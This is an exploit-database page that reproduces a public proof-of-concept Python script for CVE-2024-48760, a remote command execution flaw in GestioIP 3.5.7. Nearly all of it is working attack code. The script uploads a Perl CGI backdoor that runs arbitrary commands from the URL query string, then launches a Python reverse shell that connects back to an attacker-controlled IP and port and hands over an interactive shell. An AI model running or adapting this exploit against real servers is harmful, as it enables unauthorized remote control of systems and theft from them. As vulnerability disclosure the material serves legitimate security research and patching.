Exploit for GestioIP 3.5.7 Remote Command Execution CVE-2024-48760

Name: Exploit for GestioIP 3.5.7 Remote Command Execution CVE-2024-48760
Rating: 5 (54 reviews)
2025-04-15 | CVSS 9.8
## https://sploitus.com/exploit?id=PACKETSTORM:190466
# Exploit Title: GestioIP 3.5.7 - Remote Command Execution (RCE)
    # Exploit Author: m4xth0r (Maximiliano Belino)
    # Author website: https://maxibelino.github.io/
    # Author email (max.cybersecurity at belino.com)
    # GitHub disclosure link: https://github.com/maxibelino/CVEs/tree/main/CVE-2024-48760
    # Date: 2025-01-13
    # Vendor Homepage: https://www.gestioip.net/
    # Software Link: https://www.gestioip.net/en/download/
    # Version: GestioIP v3.5.7
    # Tested on: Kali Linux
    # CVE: CVE-2024-48760
    
    import requests
    import sys
    
    # Config
    username = "gipadmin"
    password = "PASSWORD"
    domain = "localhost"
    local_ip = "10.20.0.1"
    local_port = 443
    target_url = f"http://{domain}/gestioip/api/upload.cgi"
    
    # CGI Backdoor Perl
    backdoor_code = """#!/usr/bin/perl -w
    
    use strict;
    
    print "Cache-Control: no-cache\\n";
    print "Content-type: text/html\\n\\n";
    
    my $req = $ENV{QUERY_STRING};
    chomp ($req);
    $req =~ s/%20/ /g; 
    $req =~ s/%3b/;/g;
    $req =~ s/%7c/|/gi;
    $req =~ s/%27/'/g;
    $req =~ s/%22/"/g;
    $req =~ s/%5D/]/g;
    $req =~ s/%5B/[/g;
    
    print "<html><body>";
    print '<!-- CGI backdoor -->';
    
    if (!$req) {
        print "Usage: http://domain/gestioip/api/upload.cgi?whoami";
    } else {
        print "Executing: $req";
    }
    
    print "<pre>";
    my @cmd = `$req`;
    print "</pre>";
    
    foreach my $line (@cmd) {
        print $line . "<br/>";
    }
    
    print "</body></html>";
    """
    
    # Exploit functions
    def upload_file(session, file_name, file_data):
        """Uploads the file to the server"""
        files = {
            'file_name': (None, file_name),
            'leases_file': (file_name, file_data)
        }
        response = session.post(target_url, files=files)
        if "OK" not in response.text:
            print(f"[!] Error uploading {file_name}.")
            sys.exit(1)
        return response
    
    def run_command(session, cmd):
        """Execute a command in the server through the vuln"""
        url = target_url + '?' + cmd
        resp = session.get(url)
        print(resp.text)
    
    def backdoor_exists(session):
        """Verifies if backdoor is already uploaded or not"""
        response = session.get(target_url + "?whoami")
        if "www-data" in response.text:
            return True  # backdoor already uploaded
        return False  # backdoor not uploaded yet
    
    if __name__ == '__main__':
        with requests.Session() as session:
            session.auth = (username, password)
    
            # Verify if backdoor is already uploaded
            if not backdoor_exists(session):
                print("\n[!] Uploading backdoor...\n")
                upload_file(session, 'upload.cgi', backdoor_code)
            else:
                print("\n[+] Backdoor already uploaded. Continue...\n")
    
            # Execute the reverse shell
            print("\n[!] Executing reverse shell...\n")
            reverse_shell_cmd = f'python3 -c "import socket, subprocess, os; s=socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((\'{local_ip}\', {local_port})); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p=subprocess.call([\'/bin/sh\', \'-i\']);"'
            run_command(session, reverse_shell_cmd)